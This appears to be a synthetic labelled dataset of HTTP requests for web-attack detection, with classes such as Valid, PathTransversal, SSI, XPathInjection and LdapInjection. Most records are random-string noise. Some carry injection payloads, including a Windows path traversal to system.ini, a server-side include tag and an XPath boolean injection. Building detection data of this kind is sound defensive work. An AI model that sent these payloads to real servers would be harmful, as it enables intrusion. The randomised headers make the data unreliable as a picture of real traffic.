Accept: video/mpeg;q=0.2, application/*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: identity, compress, identity, deflate, identity;q=0.0
Accept-Language: *;q=0.6
Cache-Control: max-age=57
Client-ip: 177.158.242.79
Cookie: tEgietsona=3ihaioltn3nktd;kmgudcwoheu=83108419;ORW@cKASpe=eott7eU
Cookie2: $Version="692"
Date: Sat, 14 Oct 06 09:59:44 GMT
ETag: W/"v_vk0Xj0OAq@zEtWna"
Expect: 100-continue
From: tEpEp@tir3gian.cz
If-Modified-Since: Thu, 11 Feb 10 17:28:48 UTC
If-Unmodified-Since: Mon, 26 Sep 05 10:45:58 UTC
If-Match: "JtmEULcOu@qEsz6xjGed"
If-None-Match: *
If-Range: "NPGYDix5@7duszuj"
Max-Forwards: 3168
MIME-Version: 3.7
Pragma: pIs='sgW'
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Digest nc=56CcD28f
Range: 80947-315
Referer: /ladIcl/nseok2sm/yd8rflq.gif
TE: trailers,trailers,gzip;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 6.0; zg-it; rv:6.0.1) Gecko/94402247
UA-CPU: StrongARM
UA-Disp: 192,906,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1351x0300
Via: FTP/4.8 122.222.22.106:0, 7.1 www.fdstoan9.html
Transfer-Encoding: 4aUnR
Upgrade: t9eh/1.9, tinkbf/4.7, juE/7.8, 8ttnte/9.2
Warning: 826 40.134.212.239:799 "oazhouehnn3r" 
X-Forwarded-For: 120.79.175.50
X-Serial-Number: 43566
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

xjkk0p2=1aE_pC&EwrnmndalejSdi=dsL?rocpo&o6zaocndratt=rcIixh&oe=18346&1iie=[&Enthelhabn=nau&uaSpanaLHi=bse&Ytgftdrlc9onr=z8raeoSelRwfSddtw&wrduI1n4duiwbft=49603&ukvsm=adriEo tconae&aptsiqtAi=sock_streamautoexec@nzD;b&yoeii=s'e@d&ieeeuEoYbTi=79875

End - Id: 4130
Start - Id: 32749
class: Valid
PUT /lKJe.Vn/6Mx_k/edneJ/RyFiRrE1/dnXPJVbZew8IUYr0fjnB/yh.shtml? HTTP/1.1
Content-Length: 272
Content-Language: sha
Content-Encoding: identity
Content-Location: /dbds/gisht/eh6icrt/inett/oline.jsp
Content-MD5: UmVJMzBUZHJ0emYydGh0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Apr 08 04:40:05 UTC
Last-Modified: Tue, 06 Dec 05 12:47:06 GMT
Host: www.wnosX0de.net
Connection: close
Accept: application/x-tar;q=0.0, video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 2t48ngp-ctHr;q=0.7, m6-w1E;q=0.3, 6evho-h
Cache-Control: no-cache
Client-ip: 33.225.104.136
Cookie: teyyiA=ze;KgKreplaceeX=s;DmUtmpd=esescO;ciajnnu9=sIi1OQSVSrjN;dhsneure=inqev4Z;hrvfaeie8uuog0=phV
Cookie2: $Version="20"
Date: Sun, 02 May 10 05:56:16 CET
ETag: "KQmvMjy@tItzccQF"
Expect: 100-continue
From: ynuuOeYe@e4oe.com
If-Modified-Since: Fri, 20 Oct 06 21:23:49 UTC
If-Unmodified-Since: Tue, 19 Feb 08 15:08:48 GMT
If-Match: *
If-None-Match: "QEBPnaaNjuuHaUXM@"
If-Range: "2BAgpY4XBIDrf262uvqF"
Max-Forwards: 862
MIME-Version: 9.2
Pragma: 9g9tyhag='atem'
Proxy-Authorization: Digest response="7913fAA83fc9DcD5BDb8CfabA4Bb10C5"
Authorization: eT4oey 1cHstn=osEaI
Range: 7780-1621,55-
Referer: http://t9oe.de/4ntsis/nlenl/tnst6o/sxtmafEa.rar
TE: trailers
Trailer: Date
User-Agent: Mozilla/2.0 (X11; U; Solaris 9.9; ep-at; rv:7.7.2) Gecko/45419904
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1032x4856
Via: usevG/3.6 www.OltaaeiJ.tiff, HTTP/8.4 138.106.119.231, HTTP/7.7 www.yxi1olr.jpeg
Transfer-Encoding: identity
Upgrade: ndu/3.8
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 419486825126
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

Teulw1dn6ht=eo0varhetcYnhabtoot&0ADXEgrrnA0a=0nsebcl9&9awns=qsn&itcsthiaw8ti=erd? aid<cHsrtuLe&RiU8HA9=aDhvmvh&e5vsemesKr=5jaLA&elnbegtin=mgroup byocl5likeTtesystemxa+)ei&s8e=s;as7&joggOSbnwe=snjsNai4owas6&shutdownV.Mg5=490&Ecnclor=i@v>q&etsgtnsdIie=ttfxend 

End - Id: 32749
Start - Id: 21758
class: Valid
GET /u--QQ2Ho7cRcMWr/-wZOqCZhgIF0m/mmYsaTo/puollT/execZOtmpb/7UxQ1CyliNa/oedauxyest/andC1aB.tiff?ah2hzEeeuhcmL=amsshephEboo1es&15UUQ=adr%3C%5B&gt=a.ctdgKMuG&wa5tp9c=14&Euisgcna4Ln=hoc&teriorndle3=uluuireio&eteAmsd3oned3h=5 HTTP/1.1
Host: 212.224.92.243:0
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: AOtLh-i;q=0.1, Ppe-rjhdspn
Cache-Control: no-store
Client-ip: 139.3.29.237
Cookie: te=i@IXyZwBH@TV;4rwstorr=s7sfte1tgeRvep;efmd=inlpositionttahsw
Cookie2: $Version="446"
Date: Tue, 21 Jun 05 05:33:28 GMT
ETag: W/"5HhJBWzo8LWOT0kMx"
Expect: 100-continue
From: scmetNE@looeei.net
If-Modified-Since: Sun, 04 Jan 09 11:24:26 GMT
If-Unmodified-Since: Wed, 18 May 05 07:04:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 676
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Basic bnRhbnc3OmV2ZWRl
Range: 4-,-68,1577-
Referer: /nidm0a/zhn4/cecn6/la1sihi/lpbih.js
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/7.7 (compatible; otnl; Open BSD i586; 1irn; eGsnmM)
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9055x3634
Via: 3.5 www.Cs2tx.html, HTTP/8.6 www.r3ioB.jpg
Transfer-Encoding: compress
Upgrade: edfift/6.6, ibz/2.1, akcT/6.9, eo45/7.3, is1/3.9
Warning: 636 0.247.245.254 "swrecumaca" "Mon, 28 Apr 08 13:52:46 UTC"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21758
Start - Id: 45760
class: PathTransversal
GET /f1aeaeqwonloesiTy/pyegUNLTa-W.nunionv/uDVlzetBCA/abMA_vExzX63An_rK/2pEd./riaeotutfbanonet/z2KgwfaBrvw4CLQ3k.swf?eiepo12r=2&o9ntueeuh=ejetoher&wrdlei=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&er8mtaal=p%2Fdoa HTTP/1.1
Host: 8.91.16.185
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.1, iso-8859-5, hz-gb-2312
Accept-Encoding: deflate;q=0.3, gzip;q=0.4, deflate;q=0.8, compress, identity
Accept-Language: *;q=0.2
Cache-Control: sep='rodFesq'
Client-ip: 94.195.108.172
Cookie: topeNaOserega=l]i;i.nw9hs3=Ot'1h;aabsoita=lhdrtettlOityeTi;fi30sa=ixjRqkI;deser=ore
Cookie2: $Version="51"
Date: Sun, 14 Feb 10 07:28:48 CET
ETag: "NdluKyEsbt3wqR6uNr"
Expect: aameaew
From: EelBbSo@eeaysiht.net
If-Modified-Since: Mon, 15 Dec 08 05:25:00 CET
If-Unmodified-Since: Tue, 28 Sep 04 16:40:41 CET
If-Match: "7Iprad7Mc-o95V3"
If-None-Match: *
If-Range: "gJqyo3ohhngxeIbr"
Max-Forwards: 512
MIME-Version: 8.4
Pragma: yireiEs='newnt'
Proxy-Authorization: Basic ZXJsbnQ4OnN6Y2U=
Authorization: Bid3jw ermmy=OefhS
Range: -500252,934-3694
Referer: http://ezk4u.it/heesxmo.cgi
TE: gzip;q=0.5,deflate;q=0.0
Trailer: From
User-Agent: cYcaZt8ucf6nhsu
UA-CPU: MIPS
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: FTP/1.5 72.252.178.74
Transfer-Encoding: Os6T7i; n0Ia=ddian
Upgrade: wMsS/2.7, cdte/4.8
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 8409681186997
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45760
Start - Id: 20796
class: Valid
GET /Simq4Rnklat/Ey/SnebyhB4/miframeDTIJ2/eE19b4atolnsctaat/3ln.css? HTTP/1.1
Host: 86.41.171.71:04603
Connection: keep-alive
Accept: application/*, application/*;q=0.8, video/mpeg
Accept-Charset: windows-1250;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: s-ak2c;q=0.5, for-0WTo;q=0.0
Cache-Control: no-cache
Client-ip: 207.0.235.72
Cookie: sis=fae:tt)Wcio;dh=132;Reis=7;ix2ror3=hr4atEcRr<d\so
Cookie2: $Version="38"
Date: Mon, 19 Apr 04 19:09:28 CET
ETag: "TcCpx4krVNH050VF"
Expect: 100-continue
From: txeT@aevntoegn.com
If-Modified-Since: Sat, 27 May 06 12:41:44 CET
If-Unmodified-Since: Tue, 12 Jun 07 15:03:21 CET
If-Match: *
If-None-Match: "zV32Asw1orA8luxU"
If-Range: Wed, 21 Dec 05 18:29:35 CET
Max-Forwards: 60
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM ZXRxaWlvYWVUMVRzaW1qaGxzclRoQ1I2ZnZvMWVjMmhybzNlaXJ1YVRu
Authorization: Digest response="44E8D0Db7bdDfBf49B554f97aAF5E3e8"
Range: 468072-,7838-92,92-4796
Referer: http://www.ehsLrOId.it/aOiEm/6op0A1e7/htf0srn.fgf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: abiT5slca9atimI3grnl
UA-CPU: x86
UA-Disp: 404,2413,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7338x309
Via: 4.9 www.isih.png, HTTP/6.7 www.7eirnih.gif, 8.8 www.s9sa7.tiff
Transfer-Encoding: compress
Upgrade: 2ihUa/1.9, Dit/8.3, 5sWla/9.4
Warning: 034 102.172.89.25 "Utind" "Fri, 20 Jul 07 06:53:57 CET"
X-Forwarded-For: 204.193.168.184
X-Serial-Number: 39917227024822129
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20796
Start - Id: 39177
class: SSI
POST /Busroho.asp? HTTP/1.1
Content-Length: 270
Content-Language: nakoda,ia,yrwer
Content-Encoding: deflate
Content-Location: /rbeh/vdrk5/dfqo/Ace9iic/possu.mpeg
Content-MD5: bUljYWhuMXZzb2VqbGVlMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Nov 08 12:51:52 UTC
Last-Modified: Thu, 02 Jul 09 18:22:50 UTC
Host: 242.78.139.188
Connection: keep-alive
Accept: text/html;q=0.9, image/*, image/*
Accept-Charset: iso-8859-2;q=0.9
Accept-Encoding: identity;q=0.4, gzip;q=0.5, deflate, gzip;q=0.1, deflate;q=0.6
Accept-Language: *;q=0.8
Cache-Control: n=uoOTtl
Client-ip: 105.29.124.80
Cookie: mtet=se6a;wnWe4fG2zn4e=elr
Cookie2: $Version="261"
Date: Tue, 07 Apr 09 08:19:13 GMT
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Sun, 28 Feb 10 01:04:55 CET
If-Match: "sOzRumYnkfBqp-gFi5U_"
If-None-Match: "XIytUbg@i4Zek9twT_h"
If-Range: Tue, 07 Oct 08 16:35:25 CET
Max-Forwards: 5
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: rrorT ntloohb=goeood
Referer: /rin1.pdf
TE: trailers,gzip;q=0.0,trailers
Trailer: Pragma
User-Agent: Mozilla/9.3 (Windows; U; WinNT 1.3; hu-Ol; rv:0.3.4) Gecko/38462762
UA-Color: color8
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: deflate
Upgrade: pnoi/6.7, ita3m/3.5
~~~~~: ~~~~~~~~~~

OUfb=wi&xSiNs=527046&tlanavt0cedt=jo8&sxfewr7oao=1T1cQ9s&org=8265073&CYTwOhavingTABfC=tcb"&Kesssdt=ydm&ihnge=821428&ie=250&esel=tuydsw&annWfoo=121&r5tm9=uasra7mvbscripttrtor&updateWselectM-=aeEdgIEd&roma9bxu2o=<!--#echo var="date_gmt"-->&wcwPImocha=c5 Nr

End - Id: 39177
Start - Id: 1600
class: Valid
GET /GoH.pl? HTTP/1.0
Host: www.htdDn.biz:532
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip, identity, identity;q=0.0, compress
Accept-Language: hlrlhcEz-p7ess;q=0.7, o-taRjs;q=0.8, nyleos-ugu0aroh;q=0.0, as-t;q=0.3
Cache-Control: max-age=46
Client-ip: 40.208.133.29
Cookie: a0ejeetbQr=e ot
Cookie2: $Version="4"
Date: Sat, 09 Jan 10 23:17:10 GMT
ETag: "knTGSe5R4krTx1@Te0aN"
Expect: ea5rrcp7
From: AiEharoe@esac.fr
If-Modified-Since: Fri, 04 Mar 05 06:35:02 GMT
If-Unmodified-Since: Sun, 12 Oct 08 15:12:03 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9327
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: NTLM OWFvbmhlbnJsNWx0Y2FudHJ4c2EzZWFpZXVub2gzbmR6VzY0
Range: 3-44786
Referer: http://baMoyrf.ch/s8s4s5cs.php3
TE: chunked;q=0.1
Trailer: Expect
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 3.6; 2x-ol; rv:3.0.4) Gecko/01514485
UA-CPU: x86
UA-Disp: 1710,881,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 190x599
Via: anr/0.9 135.71.121.175, 3.0 www.oyOd.htm:8730, 9.9 57.154.137.244:1792
Transfer-Encoding: compress
Upgrade: 5cl/5.1
Warning: 296 www.angl.tiff:954 "tSr8ealShs" "Fri, 29 Sep 06 02:34:04 GMT"
X-Forwarded-For: 240.238.253.4
X-Serial-Number: 26380104869209565
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1600
Start - Id: 5687
class: Valid
POST /iq_K-j2FSVpyd9A/ieptcoiv/g00SvHVJJjRgXqzGc/XVSuvhf1U/aio.htm? HTTP/1.1
Content-Length: 24
Content-Language: ki,y9nu
Content-Encoding: identity
Content-Location: /dhe2rsr.gif
Content-MD5: aW9kZTVub055dGdvSXN1Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 04 06:27:47 GMT
Last-Modified: Sun, 21 Nov 04 03:25:51 GMT
Host: www.8tfuyebsl.st
Connection: sifemRhu
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity, compress
Accept-Language: gdhfsuh-enOshgn
Cache-Control: no-store
Client-ip: 66.85.212.245
Cookie: sen=483
Cookie2: $Version="15"
Date: Wed, 22 Sep 04 03:11:29 UTC
ETag: "gA-VXXIIO8mh8_lp"
Expect: dne9lee=e3Yttnj
From: jdYeaesr@naae.de
If-Modified-Since: Fri, 03 Jul 09 23:00:11 GMT
If-Unmodified-Since: Sat, 10 Oct 09 14:12:58 UTC
If-Match: "TbUQBjwn-v-MZb4mHy"
If-None-Match: "IaV6N-rCaO2c_8jF1DS"
If-Range: *
Max-Forwards: 936
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Digest realm
Range: 2179-017332,977-12
Referer: /koiumcrc/eteI/oinaplhN/atipeo/7uo7.aspx
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: llnvpuera/2.3.3
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 327x1132
Via: 2.4 www.Ekfxr.png:4733, HTTP/1.5 www.htror4.tiff, 6.4 www.nIonia.png
Transfer-Encoding: gzip
Upgrade: tou/1.5, iievh/5.0, uedx/3.7
Warning: 685 www.kmofeyj.css "nttltitwzunoNm" 
X-Forwarded-For: 33.1.105.183
X-Serial-Number: 7835393170
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

feoct=7&tipdtnuea=mlhed0

End - Id: 5687
Start - Id: 24076
class: Valid
GET /ttPg/EYJeXjlw/ri/i7u32rdan6ot/ha/n.sJ67_mS-8R.php3?slodjwlrTshn=+w5i&gfoKo=zaeth0eee9naeP&k0dtoe=i6o1+m5qpincludesznd0%3Dis4&nyl=424866&.LwhereVsW=ih%7Cty%5Dj&ntnde9N2Tsdi=30&9aoS=jeho1o97l HTTP/1.0
Host: www.RoAau6sd.ch:80
Connection: close
Accept: text/plain, image/png;q=0.8, video/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.9, compress;q=0.0
Accept-Language: hb-homome, 9q-o, pgi2dfta-hluingc, sr9eou-tIsotn1x, i-iEec;q=0.2
Cache-Control: min-fresh=03386
Client-ip: 246.18.133.160
Cookie: nwlwtivowtrot=9331096932
Cookie2: $Version="8"
Date: Sun, 07 Mar 04 08:37:30 UTC
ETag: W/"3RJM5DCUff-.9YZ2"
Expect: tlafwRq=toesrhEa
From: ihrtss@aubcoeh.be
If-Modified-Since: Thu, 15 Mar 07 03:20:45 GMT
If-Unmodified-Since: Mon, 26 Dec 05 09:11:21 UTC
If-Match: "KaW0IWbF805mN8q"
If-None-Match: "KhY.OhiHRkl00dIdC"
If-Range: "Hm5fln21U1E_sGN"
Max-Forwards: 405
MIME-Version: 3.7
Pragma: tenx7T='ltagi8L'
Proxy-Authorization: NTLM dWw5ZWJpbTJydHJ0dGZpSm9hdGFzdWtubW5JcU51ZWlidkptVXRkZ3V1Nk9pRQ==
Authorization: Digest nc=9BA9084e
Range: 97098-,8076-,1747-
Referer: http://uEniohat.biz/ioxcnn4v.swf
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 8.8; od-oh; rv:3.9.9) Gecko/73133264
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: 7.9 144.30.200.249, 4.7 202.86.201.177
Transfer-Encoding: identity
Upgrade: mexkvt/9.3, jmu/8.9, itee/9.6, hik0q/1.1, fi3/2.5
Warning: 205 199.45.173.96:14 "rotui9h8te" 
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 0084225845225079837
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24076
Start - Id: 2726
class: Valid
GET /5jTDWC-l2/eMPw/ttpndnexteyauay5/dB7vZUVeBnzk/vudd6oEme/1ICE3PtHLMn2z/w8h3/D3KRktGd8/cfaGbhzgvx9xy__RaE/dsK-.png?6j9iSLmetav6=04313535&il8e5oPsaozica=n%3Fdp&ruu=42217197&seh6bsxa=t+&sorteettSi=tgroup+by HTTP/1.1
Host: 72.59.139.240
Connection: cgcr
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=70
Client-ip: 5.163.223.176
Cookie: oreenhicw9=t-F;omgr7rniadbl=usvaraa ciwezS;Abqlxf2relbo=06769;NFl85ulinkyXa=exmly?ooselectm
Cookie2: $Version="995"
Date: Fri, 13 Apr 07 06:54:12 UTC
ETag: "fVcf6WcZKl0d257X"
Expect: 100-continue
From: dasa@Cnth.cz
If-Modified-Since: Tue, 09 Mar 10 10:08:37 UTC
If-Unmodified-Since: Sun, 01 Feb 09 18:08:02 UTC
If-Match: "79s8lQ@CwQawne0q"
If-None-Match: *
If-Range: Fri, 11 Sep 09 18:44:31 UTC
Max-Forwards: 9523
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: trpc ecamie=otT3Eavi
Range: 32-25
Referer: http://www.holoi.fr/oolnk/ojoat/Nefwna5E/oomLnoe.htm
TE: chunked;q=0.7,trailers,deflate
Trailer: From
User-Agent: Mozilla/3.1 (Windows; U; Win 9x 3.9; co-od; rv:9.3.7) Gecko/41874397
UA-CPU: 68000
UA-Disp: 991,432,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9002x158
Via: cdegvs/7.6 www.toeAd.png
Transfer-Encoding: mamht
Upgrade: ztd/6.6, uveUC/2.7, edns/8.2, 7mo/6.6
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2726
Start - Id: 5092
class: Valid
POST /mail@Gl4ZQx/tTscript/0WvYie8Vh@ayF/EnRC/r-FmSP@tIAOQ7/lnP4WHyukI/7TJBtWtYr/hso/tbe/3onE9lrtoeorln5asUz/Hu.jsp? HTTP/1.1
Content-Length: 68
Content-Language: saofdr,4sihaaa
Content-Encoding: gzip
Content-Location: http://www.useis.biz/osltwkhz/ses99nhN.nsf
Content-MD5: d1NyclRraGFnVHMweWNscA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Feb 04 07:26:47 GMT
Last-Modified: Fri, 07 Mar 08 04:45:37 GMT
Host: 143.43.244.25
Connection: close
Accept: video/*;q=0.4
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: e2mD9-vaqsw;q=0.4, bsrgna-r33e;q=0.5
Cache-Control: rsnm=y
Client-ip: 56.116.172.92
Cookie: nlcisAt=cf]iopenub
Cookie2: $Version="427"
Date: Tue, 13 May 08 02:42:42 GMT
ETag: "z5AR9Mt0J0kRyOEf4"
Expect: 100-continue
From: eiats@ade7g.de
If-Modified-Since: Tue, 28 Nov 06 11:36:12 UTC
If-Unmodified-Since: Mon, 26 Apr 10 23:55:42 CET
If-Match: "QveQ3tUlPsDkv8vTbSx"
If-None-Match: *
If-Range: Sun, 09 Mar 08 03:53:48 UTC
Max-Forwards: 6128
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Basic Z3JhbmRpMTI6dDQ5ZTgwaQ==
Range: 4666-,507125-81685,186998-
Referer: /LI3yrstH/Roet7l7/rbxD8so/Tmsfluac.css
TE: deflate
Trailer: Host
User-Agent: tvinETn (tXzYrV@Nc3; tjQikiZ; q2xxq8q)
UA-CPU: PowerPC
UA-Disp: 2471,605,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7848x0876
Via: HTTP/6.9 www.ereinzE.css:87699
Transfer-Encoding: compress
Upgrade: wdrl1/4.6, o0t/6.1, R5oleg/3.8, gde/0.1
Warning: 172 www.tonle.shtml "itac7inoeo6towt2" "Fri, 23 May 08 05:18:47 CET"
X-Forwarded-For: 187.213.168.146
X-Serial-Number: 093025273
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

xpasdaif0k2wnR=g&hweeyiaez7a=6122339312&3EC8FPGmOdK=tvLngQDVa4&5h=47

End - Id: 5092
Start - Id: 48502
class: XPathInjection
PUT /ftp7X6-lQgbetweenNDS0/yA3oenezsi/a7shutdownQ0Uexec7connectj1D/PyYexecrDW45HnullO_B/swnA/o-VSCcja0/eeIxcokfffs/JpasswdG4q6lXinsertC.js? HTTP/1.1
Content-Length: 342
Content-Language: rYls,oenlh9iw,l6ied
Content-Encoding: identity
Content-Location: http://usuiia7.uk/lefsy/siAzew/TrunSnAs.fgf
Content-MD5: dXQ5cmlvc29lRGFjbnNQMw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Oct 07 18:12:09 GMT
Last-Modified: Sun, 23 Apr 06 02:18:15 CET
Host: www.hheiierowt.net:80
Connection: keep-alive
Accept: text/xml
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: 4vhpSs-ilov;q=0.3, 0n-s;q=0.7, EnI-tmn5dr, dniwtc3l-it
Cache-Control: only-if-cached
Client-ip: 186.162.234.129
Cookie: uytsnaeasiulot=nane9ripm0o
Cookie2: $Version="932"
Date: Sun, 28 May 06 18:12:18 GMT
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: vnemc
From: numhoTo@rsni1ore.com
If-Modified-Since: Fri, 01 May 09 12:08:42 GMT
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: "HEIPNYUXvoM-pIeztMy"
If-None-Match: *
If-Range: Fri, 26 Aug 05 07:49:20 UTC
Max-Forwards: 9249
MIME-Version: 1.8
Pragma: no-cache
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: /stmrehT/tmz1Eia/emdivf.tiff
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 2.7; zn-mo; rv:6.1.0) Gecko/47747408
Via: eae/2.8 www.0p9a.htm, HTTP/5.6 37.124.9.63
Transfer-Encoding: compress
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------

Dacceptjt=jcoiAqe8rz&nhE=ooe493rm&r9o1ehEa=733&jKwt5tmttt=iftp0|i&rnhf=hrnd6dead9qessime&ii=ieih846totifERdt&tgohir8e= la6&thahje85caupms=telnettelnetuoinputajhisuservices &StlnantilPrwdca=3&ltrtoauae=twfoseg' or     6   < count(path/child::*)     or 'imn'   =  '&nkcjStbj9Aaa=83&mbjXcJcPps=w &rutdl=iq&ogF1smms=leOeeq

End - Id: 48502
Start - Id: 6315
class: Valid
POST /yeusl0i7enr44l/o58qFCMY1/s19msnse/hGP.pcXqSDf1oQb0chdq/Uprocessing-instructionYgIlinkOkqZ/isxPP887ZbetweenCoprocessing-instruction/lbKinsertOFLRm3x/rncfoN4/dRgnWL.rejb5V/naneSc6stStcfisuLat0/UkHboot.iniblCUEW/rn5ehOatotriseonh.png? HTTP/1.0
Content-Length: 113
Content-Language: ese,g5cst,nE
Content-Encoding: identity
Content-Location: http://www.ogoheE.st/a2cAa/hTeT4/enHpos.conf
Content-MD5: dmhzcnRvb2l3T2NlbzN0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Jul 04 06:31:29 UTC
Last-Modified: Sat, 03 Jan 09 13:12:20 GMT
Host: www.oalt.de:80
Connection: Ieeeb1o
Accept: */*;q=0.8
Accept-Charset: iso-8859-2;q=0.0, iso-8859-5, big5;q=0.1
Accept-Encoding: 
Accept-Language: em2ss-m;q=0.0, Pesa-o;q=0.6, du-As
Cache-Control: no-cache
Client-ip: 71.174.220.192
Cookie: ticfJIu=cdK;HsVeim=254013
Cookie2: $Version="988"
Date: Wed, 31 Aug 05 13:02:34 GMT
ETag: "-Zl8NTU7iqojl84mz"
Expect: 100-continue
From: ai8tEt@dHaaiz4iys.net
If-Modified-Since: Thu, 21 Aug 08 15:57:42 CET
If-Unmodified-Since: Sat, 22 Sep 07 11:31:19 GMT
If-Match: "ytKGry.20KqrHf-MMy6"
If-None-Match: "7zkZ8RtesgOZvT35QAb"
If-Range: "8AdEex0uAR7VviA"
Max-Forwards: 2673
MIME-Version: 0.0
Pragma: tdhs=9olc
Proxy-Authorization: yiIr IiWelvS=hslc
Authorization: 6Pizas ootTdnN=dteto
Range: 137601-
Referer: /emxt/oacis3ri/haeeon/mjhWs/rammeh.htm
TE: deflate;q=0.8,gzip
Trailer: Transfer-Encoding
User-Agent: lsstavn (n46ZEZx; erBVBqU2; rhG@0b@; uLyG@Jg@)
UA-CPU: 68000
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 679x627
Via: 3.1 72.151.51.230, 9.6 245.143.143.85:39
Transfer-Encoding: compress
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 9387717978
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

QA5rP@@V=4Zi8lFAdMj&so2ulsseocw8tv=esytcls8oli7lOe&mterh=sddAelo2habin&Ay=VUerlra&m8tdemsio=uEhyp2z&pst=714566794

End - Id: 6315
Start - Id: 38724
class: LdapInjection
